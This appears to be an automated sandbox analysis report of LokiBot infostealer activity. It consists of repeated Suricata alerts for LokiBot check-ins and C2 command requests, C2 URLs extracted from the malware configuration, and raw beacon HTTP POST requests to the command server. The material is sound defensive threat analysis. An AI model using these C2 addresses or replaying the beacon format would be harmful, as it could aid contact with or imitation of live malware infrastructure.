Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50003 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50003 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49985 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49927 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49927 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49795 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49927 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50003 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49769
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49927 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49786
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50003 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49927 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50019 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49857 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49950 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49941 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49875
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49792
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49790
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49985
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49882 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49857
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49910 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50045 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50003
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49910 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49927
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49974
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49837 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49910 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49837 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49837 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50060 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49910 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49785 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50019
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49991 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49950
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49783 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49910 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49837 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49837 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49801
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49784 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49991 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49991 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50116 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50116 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49783 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50060
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49991 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50112 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50112 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50118 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50118 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49991 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50038
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49910
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49783 -> 94.156.177.41:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /mars/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 715C4138Content-Length: 149Connection: close
